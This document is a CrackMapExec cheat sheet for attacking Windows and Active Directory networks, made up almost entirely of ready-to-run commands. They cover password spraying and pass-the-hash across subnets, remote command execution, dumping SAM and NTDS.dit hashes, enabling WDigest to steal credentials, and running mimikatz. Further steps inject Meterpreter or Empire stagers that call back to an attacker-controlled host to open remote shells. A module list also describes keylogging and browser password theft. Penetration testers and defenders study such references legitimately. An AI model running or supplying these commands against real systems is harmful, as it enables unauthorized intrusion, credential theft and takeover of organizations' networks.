CRACKMAPEXEC
Connections and Spraying
General help
crackmapexec --help
Protocol help
crackmapexec smb --help
Target format
crackmapexec smb ms.evilcorp.org
crackmapexec smb 192.168.1.0 192.168.0.2
crackmapexec smb 192.168.1.0-28 10.0.0.1-67
crackmapexec smb 192.168.1.0/24
crackmapexec smb targets.txt
Null session
crackmapexec smb 192.168.10.1 -u "" -p ""
Connect to the target using a local account
crackmapexec smb 192.168.215.138 -u 'Administrator' -p 'PASSWORD' --local-auth
Pass the hash against a subnet
crackmapexec smb 172.16.157.0/24 -u administrator -H 'LMHASH:NTHASH' --local-auth
crackmapexec smb 172.16.157.0/24 -u administrator -H 'NTHASH'
Brute force and password spraying
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1"
crackmapexec smb 192.168.100.0/24 -u "admin" -p "password1" "password2"
crackmapexec smb 192.168.100.0/24 -u "admin1" "admin2" -p "P@ssword"
crackmapexec smb 192.168.100.0/24 -u user_file.txt -p pass_file.txt
crackmapexec smb 192.168.100.0/24 -u user_file.txt -H ntlm_hashFile.txt
Enumeration
Users
Enumerate users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --users
Perform a RID brute force to obtain users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --rid-brute
Enumerate domain groups
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --groups
Enumerate local users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --local-users
Hosts
Generate a list of relayable hosts (SMB signing disabled)
crackmapexec smb 192.168.1.0/24 --gen-relay-list output.txt
Enumerate available shares
crackmapexec smb 192.168.215.138 -u 'user' -p 'PASSWORD' --local-auth --shares
Get active sessions
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --sessions
Check logged-on users
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --lusers
Get the password policy
crackmapexec smb 192.168.215.104 -u 'user' -p 'PASS' --pass-pol
Execution and Other
CrackMapExec has 3 different command execution methods (in default order):
- wmiexec -> WMI
- atexec -> scheduled task
- smbexec -> create and run a service
Execute a command via cmd.exe (administrator privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x 'whoami'
Force the smbexec method
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'net user Administrator /domain' --exec-method smbexec
Execute commands via PowerShell (administrator privileges required)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X 'whoami'
Credential Gathering
Dump local SAM hashes
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --sam
Enable or disable WDigest to obtain credentials from LSA memory
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest enable
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth --wdigest disable
Force logoff (quser lists the session IDs that logoff takes as its argument)
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'quser'
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -x 'logoff <SESSION_ID>'
Dump the DC's NTDS.dit using the secretsdump.py methods
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
Use the Volume Shadow Copy Service
crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Dump the NTDS.dit password history
crackmapexec smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
Database Usage
The database automatically stores every host CME has reached and every credential that has administrator access
$ cmedb
Using workspaces
cmedb> workspace create test
cmedb> workspace test
Access a protocol database and go back
cmedb (test)> proto smb
cmedb (test)> back
List stored hosts
cmedb> hosts
View detailed information for a specific machine (including credentials)
cmedb> hosts <HOSTNAME_OR_IP>
Get stored credentials
cmedb> creds
Get credential access for a specific account
cmedb> creds <USERNAME>
Use credentials from the database (the -id argument is the credential ID shown by creds)
crackmapexec smb 192.168.100.1 -id <CREDS_ID>
Modules
List available modules
crackmapexec smb -L
Module information
crackmapexec smb -M mimikatz --module-info
View module options
crackmapexec smb -M mimikatz --options
Mimikatz module
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M mimikatz
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' -M mimikatz
crackmapexec smb 192.168.215.104 -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'
Other modules
[*] Get-ComputerDetails Enumerates sysinfo
[*] bloodhound Executes the BloodHound recon script on the target and retrieves the results to the attacker's machine
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_avproducts Gathers information on all endpoint protection solutions installed on the remote host(s) via WMI
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_keystrokes Logs keys pressed, time and the active window
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_netrdpsession Enumerates all active RDP sessions
[*] get_timedscreenshot Takes screenshots at a regular interval
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] invoke_sessiongopher Digs up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using SessionGopher
[*] invoke_vnc Injects a VNC client in memory
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mimikatz Dumps all logon credentials from memory
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] mimikittenz Executes Mimikittenz
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] netripper Captures credentials by using API hooking
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] rdp Enables/Disables RDP
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writable shares
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] slinky Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
[*] test_connection Pings a host
[*] tokens Enumerates available tokens
[*] uac Checks UAC status
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
Getting Shells
Metasploit
First, set up an HTTP reverse handler
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.10.3
msf exploit(handler) > set exitonsession false
msf exploit(handler) > exploit -j
Met_Inject module
crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --local-auth -M met_inject -o LHOST=YOURIP LPORT=4444
Empire
Start the RESTful API
empire --rest --user empireadmin --pass gH25Iv1K68@^
Set up an HTTP listener in Empire
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list
Empire module
crackmapexec smb 192.168.215.104 -u Administrator -p PASSWORD --local-auth -M empire_exec -o LISTENER=CMETest